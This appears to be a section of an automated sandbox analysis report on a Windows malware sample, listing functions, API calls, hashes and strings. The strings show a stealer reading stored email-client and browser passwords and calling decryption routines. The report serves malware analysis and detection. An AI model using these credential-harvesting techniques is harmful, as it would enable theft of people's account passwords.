                          • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                          • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                          • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                          Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                            • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                            • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                            • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfile$StringWrite_itoamemset
                          • String ID:
                          • API String ID: 4165544737-0
                          • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                          • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                          • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                          • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                          Function 00410B62 Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Enum
                          • String ID:
                          • API String ID: 2928410991-0
                          • Opcode ID: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                          • Instruction ID: 8a3f31470ea8a8b3d952542b098f2abe59e4a6ac9f2d43bd6bb9c8582bf8d7d6
                          • Opcode Fuzzy Hash: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                          • Instruction Fuzzy Hash: 4AD067B950010EFFDF01DFA0ED45DBE7BBDEB04208F008061BD15D2151D7719A15ABA4
                          Function 00410ADD Relevance: 1.5, APIs: 1, Instructions: 16registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: QueryValue
                          • String ID:
                          • API String ID: 3660427363-0
                          • Opcode ID: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                          • Instruction ID: d2a128bda891c33a071a1d1ce147914e72007c559b7d4fbb3b047f84c0d4c772
                          • Opcode Fuzzy Hash: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                          • Instruction Fuzzy Hash: 45D092B540020EFFDF018F81EC45EEE7BBDFB04348F104166BA05A6060E671AB55ABA4
                          Function 00407560 Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                          Download Yara Rule
                          APIs
                          • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                          • Instruction ID: 410abe984f7b5dc679d26b2641a37aa2388815a2676dab069d7a0e9e19a31d2a
                          • Opcode Fuzzy Hash: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                          • Instruction Fuzzy Hash: ECD0C93501020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB94
                          Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                          • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                          • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                          • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                          Function 0040C580 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                          • Instruction ID: 388ad9edf2a2a7c68189f8b324949551c1d57bd7625714ace597e57fc5aec2ed
                          • Opcode Fuzzy Hash: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                          • Instruction Fuzzy Hash: 77B09B7681A53096D43577153405BDE135C9FD575474701EBB5043B28545187D4141DD
                          Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00406D2C
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                          • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                          • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                          • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                          Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                          • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                          • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                          • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                          Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                          Download Yara Rule
                          APIs
                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                          • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                          • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                          • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                          Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                          • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                          • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                          • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                          Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                          • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                          • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                          • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                          Non-executed Functions

                          Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                          • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                          • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                          • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                          • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                          • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                          • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                          • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                          • API String ID: 2238633743-192783356
                          • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                          • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                          • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                          • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                          Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileString_mbscmpstrlen
                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                          • API String ID: 3963849919-1658304561
                          • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                          • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                          • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                          • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                          Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@memcpymemset
                          • String ID: (yE$(yE$(yE
                          • API String ID: 1865533344-362086290
                          • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                          • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                          • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                          • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                          Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040EBD8
                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                          • memset.MSVCRT ref: 0040EC2B
                          • memset.MSVCRT ref: 0040EC47
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                          • memset.MSVCRT ref: 0040ECDD
                          • memset.MSVCRT ref: 0040ECF2
                          • _mbscpy.MSVCRT ref: 0040ED59
                          • _mbscpy.MSVCRT ref: 0040ED6F
                          • _mbscpy.MSVCRT ref: 0040ED85
                          • _mbscpy.MSVCRT ref: 0040ED9B
                          • _mbscpy.MSVCRT ref: 0040EDB1
                          • _mbscpy.MSVCRT ref: 0040EDC7
                          • memset.MSVCRT ref: 0040EDE1
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                          • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                          • API String ID: 3137614212-1455797042
                          • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                          • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                          • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                          • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                          Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                            • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                            • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                            • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                          • memset.MSVCRT ref: 0040E5B8
                          • memset.MSVCRT ref: 0040E5CD
                          • _mbscpy.MSVCRT ref: 0040E634
                          • _mbscpy.MSVCRT ref: 0040E64A
                          • _mbscpy.MSVCRT ref: 0040E660
                          • _mbscpy.MSVCRT ref: 0040E676
                          • _mbscpy.MSVCRT ref: 0040E68C
                          • _mbscpy.MSVCRT ref: 0040E69F
                          • memset.MSVCRT ref: 0040E6B5
                          • memset.MSVCRT ref: 0040E6CC
                            • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                            • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                          • memset.MSVCRT ref: 0040E736
                          • memset.MSVCRT ref: 0040E74F
                          • sprintf.MSVCRT ref: 0040E76D
                          • sprintf.MSVCRT ref: 0040E788
                          • _strcmpi.MSVCRT ref: 0040E79E
                          • _strcmpi.MSVCRT ref: 0040E7B7
                          • _strcmpi.MSVCRT ref: 0040E7D3
                          • memset.MSVCRT ref: 0040E858
                          • sprintf.MSVCRT ref: 0040E873
                          • _strcmpi.MSVCRT ref: 0040E889
                          • _strcmpi.MSVCRT ref: 0040E8A5
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                          • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                          • API String ID: 4171719235-3943159138
                          • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                          • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                          • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                          • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                          Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                          • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                          • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                          • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                          • GetWindowRect.USER32(00000000,?), ref: 0041047C
                          • GetWindowRect.USER32(?,?), ref: 00410487
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                          • GetDC.USER32 ref: 004104E2
                          • strlen.MSVCRT ref: 00410522
                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                          • ReleaseDC.USER32(?,?), ref: 00410580
                          • sprintf.MSVCRT ref: 00410640
                          • SetWindowTextA.USER32(?,?), ref: 00410654
                          • SetWindowTextA.USER32(?,00000000), ref: 00410672
                          • GetDlgItem.USER32(?,00000001), ref: 004106A8
                          • GetWindowRect.USER32(00000000,?), ref: 004106B8
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                          • GetClientRect.USER32(?,?), ref: 004106DD
                          • GetWindowRect.USER32(?,?), ref: 004106E7
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                          • GetClientRect.USER32(?,?), ref: 00410737
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                          • String ID: %s:$EDIT$STATIC
                          • API String ID: 1703216249-3046471546
                          • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                          • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                          • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                          • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                          Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004024F5
                            • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                          • _mbscpy.MSVCRT ref: 00402533
                          • _mbscpy.MSVCRT ref: 004025FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscpy$QueryValuememset
                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                          • API String ID: 168965057-606283353
                          • Opcode ID: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                          • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                          • Opcode Fuzzy Hash: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                          • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                          Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                          • LoadCursorA.USER32(00000067), ref: 0040115F
                          • SetCursor.USER32(00000000), ref: 00401166
                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                          • EndDialog.USER32(?,00000001), ref: 0040121A
                          • DeleteObject.GDI32(?), ref: 00401226
                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                          • ShowWindow.USER32(00000000), ref: 00401253
                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                          • ShowWindow.USER32(00000000), ref: 00401262
                          • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                          • memset.MSVCRT ref: 0040128E
                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                          • String ID:
                          • API String ID: 2998058495-0
                          • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                          • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                          • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                          • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                          Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmp$memcpy
                          • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                          • API String ID: 231171946-2189169393
                          • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                          • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                          • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                          • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                          Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscat$memsetsprintf$_mbscpy
                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                          • API String ID: 633282248-1996832678
                          • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                          • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                          • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                          • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
